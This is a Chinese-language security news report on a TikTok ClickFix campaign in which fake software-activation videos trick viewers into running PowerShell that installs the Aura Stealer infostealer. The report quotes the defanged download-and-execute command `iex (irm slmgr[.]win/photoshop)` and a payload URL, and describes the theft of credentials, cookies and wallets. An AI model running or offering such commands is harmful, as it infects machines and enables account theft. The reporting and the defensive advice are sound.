网络犯罪分子利用伪装成免费软件激活指南的视频在 TikTok 上传播信息窃取恶意软件。根据 电脑发出蜂鸣声ISC 处理程序 Xavier Mertens 确认了正在进行的活动,该活动采用一种称为 ClickFix 攻击的社会工程方法来感染计算机系统。观察到的视频 电脑发出蜂鸣声,声称提供激活合法软件(例如 Windows、Microsoft 365、Adobe Premiere、Photoshop、CapCut Pro 和 Discord Nitro)的说明。该活动还宣传虚构的服务,包括“Netflix Premium”和“Spotify Premium”。 Mertens 指出,这一活动与安全公司趋势科技之前在 5 月份观察到的活动基本相同。这些视频使用社会工程技术,提供看似有效的修复或一组指令来欺骗用户危害他们自己的机器。此 ClickFix 攻击会诱骗用户执行恶意 PowerShell 命令。每个视频显示一行命令,例如 `iex (irm slmgr[.]win/photoshop)`,并指示查看者以管理员权限运行它。 URL中的程序名称被修改以匹配被模拟的软件;假冒的 Windows 指南会使用包含“windows”而不是“photoshop”的 URL。执行命令时,PowerShell 连接到远程站点 `slmgr[.]win` 检索并运行另一个 PowerShell 脚本。该脚本从 Cloudflare 页面下载两个可执行文件。第一个来自`https://file-epq[.]页面[.]dev/updater.exe`,是 Aura Stealer 恶意软件的变种。该信息窃取程序旨在收集保存的浏览器凭据、身份验证 cookie、加密货币钱包数据和其他应用程序凭据。然后,被盗数据会上传给攻击者,使他们能够访问受害者的帐户。作为攻击的一部分,还下载了第二个有效负载“source.exe”。根据 Mertens 的说法,这个可执行文件使用 .NET 的内置 Visual C# 编译器(“csc.exe”)自编译代码。生成的代码随后被注入并直接在内存中启动。这一额外有效载荷的具体用途仍不清楚。已执行这些步骤的用户应考虑其所有凭据已被泄露。建议的行动方案是立即重置他们使用的所有网站和服务的密码,以防止未经授权的帐户访问和进一步的数据盗窃。 ClickFix 攻击在过去一年中变得流行,并用于在勒索软件和加密货币盗窃活动中传播各种恶意软件。作为一般规则,用户永远不应该从网站复制文本并在操作系统对话框中运行它。此通报包括文件资源管理器地址栏、命令提示符、PowerShell 提示、macOS 终端和 Linux shell。
